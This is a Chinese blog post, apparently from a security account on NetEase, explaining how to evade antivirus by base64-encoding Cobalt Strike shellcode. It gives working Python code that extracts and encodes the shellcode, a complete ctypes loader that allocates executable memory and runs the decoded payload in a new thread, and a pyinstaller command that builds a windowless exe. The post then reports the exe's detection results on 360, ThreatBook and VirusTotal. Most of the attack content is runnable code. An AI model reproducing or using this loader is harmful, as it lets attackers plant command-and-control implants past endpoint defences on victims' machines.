网易首页 > 网易号 > 正文 申请入驻

免杀 - shellcode简单混淆BypassAv

0
分享至

前言

在进行渗透测试过程中,往往会遇到主机有杀软,导致我们的木马被查杀,那么我们就得想办法绕过杀软进行上线Cobalt strike 或者 Metasploiit

环境: Cobalt strike 4.1 Python pyinstaller

何为shellcode?

百度百科是这样介绍它的:

“shellcode是一段用于利用软件漏洞而执行的代码,shellcode为16进制的机器码,因为经常让攻击者获得shell而得名”

何为shellcode混淆?

其实就是把我们的shellcode进行加密:如base64,AES等等

实现过程

1、生成shellcode 2、把shellcode加密 3、构造shellcode加载器 4、shellcode加载器把我们加密过后的shellcode解密 5、执行程序,上线C2

下面我也直观的列举了一幅图来说明,如下

利用cobalt strike生成shellcode

生成Python shellcode x64

会得到这样一个内容文件

简单处理payload.py shellcode文件

1、你可以直接把双引号里面的内容复制出来

2、写代码提取出来

这里我用的第二种,附自己写的垃圾代码

这样就能简单处理我们的shellcode文件

对我们提取出来的shellcode进行加密

这里我使用base64加密

1、可以直接使用在线的base64网站加密


https://base64.us/

2、自写代码进行加密

这里使用Python base64库,附代码

# coding=utf-8import base64# 读取shellcode文件shellcode = open('payload.py')shellcode = shellcode.read()# 取出shellcode内容s1 = shellcode.find("\"")+1s2 = shellcode.rfind("\"")shellcode = shellcode[s1:s2]# print(shellcode)# 把shellcode base64加密并写入base64.txt文件base64_shellcode = base64.b64encode(shellcode.encode('UTF-8'))with open('base64.txt', 'wb') as shell:shell.write(base64_shellcode)
编写加载器

这里直接附代码

import base64import codecsimport ctypesshellcode = ""shellcode = base64.b64decode(shellcode)shellcode = codecs.escape_decode(shellcode)[0]shellcode = bytearray(shellcode)# 设置VirtualAlloc返回类型为ctypes.c_uint64ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64# 申请内存ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))# 放入shellcodebuf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr),buf,ctypes.c_int(len(shellcode)))# 创建一个线程从shellcode放置位置首地址开始执行handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_uint64(ptr),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))# 等待上面创建的线程运行完ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))

把我们加密过后的shellcode放进shellcode = ""里

测试,能否上线

利用pyinstaller打包成exe
pyinstaller -F bypassav.py -w

生成exe

测试能否上线

测试免杀率

1、本地360

2、微步在线

3、VT查杀

结尾

这篇只是一个引子,大家还可以考虑

1、对我们生成的exe再进行混淆

2、分离shellcode

后续有时间会给大家写一篇分离shellcode,上述过程皆可进行自动化生成,我已经实现到自己的平台了

特别声明:以上内容(如有图片或视频亦包括在内)为自媒体平台“网易号”用户上传并发布,本平台仅提供信息存储服务。

Notice: The content above (including the pictures and videos if any) is uploaded and posted by a user of NetEase Hao, which is a social media platform and only provides information storage services.

相关推荐
热点推荐
江苏女排3:1北京,吴梦洁砍26分但赛后累倒在地!她太辛苦了

江苏女排3:1北京,吴梦洁砍26分但赛后累倒在地!她太辛苦了

金毛爱女排
2025-12-27 20:32:08
李在明终于大仇得报,65岁尹锡悦三罪并罚,他的妻子被求刑15年

李在明终于大仇得报,65岁尹锡悦三罪并罚,他的妻子被求刑15年

闻识
2025-12-27 10:33:12
舒淇在节目里第一次承认,她和冯德伦为了要孩子已经折腾了九年。

舒淇在节目里第一次承认,她和冯德伦为了要孩子已经折腾了九年。

岁月有情1314
2025-11-29 15:40:25
中国驻墨西哥使馆:奉劝纳瓦罗之流认真反思错误,停止自欺欺人的表演

中国驻墨西哥使馆:奉劝纳瓦罗之流认真反思错误,停止自欺欺人的表演

环球网资讯
2025-12-27 06:43:19
老婆败光20亿家产传闻真相大白10个月,曝张学友近况,一点不意外

老婆败光20亿家产传闻真相大白10个月,曝张学友近况,一点不意外

素衣读史
2025-12-26 17:30:27
顶流空降深圳!有人早上开始排队

顶流空降深圳!有人早上开始排队

深圳晚报
2025-12-26 22:19:48
304万亿,我国的货币发行总量已经是世界第一了。

304万亿,我国的货币发行总量已经是世界第一了。

流苏晚晴
2025-11-18 20:20:14
网友制作徐湖平AI视频进行恶搞,网传他家中被搜出37件文物

网友制作徐湖平AI视频进行恶搞,网传他家中被搜出37件文物

映射生活的身影
2025-12-26 18:01:46
Shams:湖人后卫里夫斯左腿腓肠肌二级拉伤,将在四周后复查

Shams:湖人后卫里夫斯左腿腓肠肌二级拉伤,将在四周后复查

懂球帝
2025-12-27 10:26:34
死刑!发小害死妻儿案宣判!家属拒注射死刑,文明不该给凶手体面

死刑!发小害死妻儿案宣判!家属拒注射死刑,文明不该给凶手体面

蜉蝣说
2025-12-27 12:50:16
研究发现:主食一换,每年癌死少一半,提倡吃4种主食,建议看看

研究发现:主食一换,每年癌死少一半,提倡吃4种主食,建议看看

展望云霄
2025-12-17 21:34:55
C罗也挽救不了亚冠二级联赛的人气,仅8000多人观看

C罗也挽救不了亚冠二级联赛的人气,仅8000多人观看

星耀国际足坛
2025-12-26 23:15:56
新一轮下岗潮杀到?这4个行业最先被淘汰,看看你中招没

新一轮下岗潮杀到?这4个行业最先被淘汰,看看你中招没

老特有话说
2025-12-25 12:15:23
重磅!交易小波特!勇士终于想通了!

重磅!交易小波特!勇士终于想通了!

血色怒火
2025-12-27 15:25:48
向太曝马伊琍已再婚:当年文章过不了心理那关

向太曝马伊琍已再婚:当年文章过不了心理那关

娱乐看阿敞
2025-12-12 15:50:00
财经老王丨新政落地 个人买黄金要多缴税吗?

财经老王丨新政落地 个人买黄金要多缴税吗?

北青网-北京青年报
2025-11-15 21:23:05
商业航天“牛股”遭立案!翻倍涨势,恐将戛然而止?

商业航天“牛股”遭立案!翻倍涨势,恐将戛然而止?

格隆汇
2025-12-27 18:16:03
53岁吴越自曝单身生活,为父母买上海大平层,坦言孤独是一种福报

53岁吴越自曝单身生活,为父母买上海大平层,坦言孤独是一种福报

好贤观史记
2025-12-16 17:01:31
这份邀请函,特朗普亲自发出,在中俄最敏感的地方,埋下两颗巨雷

这份邀请函,特朗普亲自发出,在中俄最敏感的地方,埋下两颗巨雷

张学昆看世界
2025-12-27 19:33:41
中国军队回撤时越军为何不追击?越南少将阮德辉回忆:并非不敢打

中国军队回撤时越军为何不追击?越南少将阮德辉回忆:并非不敢打

古书记史
2025-12-22 19:50:50
2025-12-27 21:36:49
重生信息安全
重生信息安全
专注网络安全行业
45文章数 184关注度
往期回顾 全部

科技要闻

小米也涨价了!业界称终端再不涨明年必亏

头条要闻

美媒:特朗普显然触及了中国的红线 中方怒了

头条要闻

美媒:特朗普显然触及了中国的红线 中方怒了

体育要闻

NBA教练圈的布朗尼,花了22年证明自己

娱乐要闻

张昊唯逃税涉黄风波落幕:法院认定朋友造谣

财经要闻

注意,开始拉物价了!

汽车要闻

好音响比大屏更重要?车企开始“听”用户的

态度原创

数码
本地
家居
房产
公开课

数码要闻

铭凡DEG2显卡坞发布,开放式设计且多接口配置

本地新闻

云游安徽|踏访池州,读懂山水间的万年史书

家居要闻

格调时尚 智慧品质居所

房产要闻

年销20亿+!中交·蓝色港湾用好房子致敬好生活

公开课

李玫瑾:为什么性格比能力更重要?

无障碍浏览 进入关怀版